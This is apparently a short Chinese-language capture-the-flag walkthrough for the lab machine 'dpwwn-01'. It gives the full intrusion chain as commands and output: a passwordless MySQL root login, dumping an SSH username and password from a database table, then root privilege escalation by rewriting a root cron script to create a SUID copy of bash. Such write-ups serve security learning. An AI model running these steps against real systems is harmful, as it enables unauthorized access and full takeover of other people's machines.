跳转至

dpwwn-01

usershell

目标IP:192.168.205.147

服务信息:

22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql

fscan

[+] mysql:192.168.205.147:3306:root 

mysql 连接

mysql -h 192.168.205.147 -u root

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| ssh                |
+--------------------+
4 rows in set (0.009 sec)

MariaDB [(none)]> use ssh;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [ssh]> show tables;
+---------------+
| Tables_in_ssh |
+---------------+
| users         |
+---------------+
1 row in set (0.008 sec)

MariaDB [ssh]> select * from ssh.users;
+----+----------+---------------------+
| id | username | password            |
+----+----------+---------------------+
|  1 | mistic   | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.003 sec)

获得ssh凭据

登录ssh,得到user权限

rootshell

枚举

cat /etc/crontab

*/3 *  * * *  root  /home/mistic/logrot.sh

修改logrot.sh

#!/bin/bash
# 
cp /bin/bash /home/mistic/rootbash
chmod +xs /home/mistic/rootbash

等几分钟

~/rootbash -p获得root权限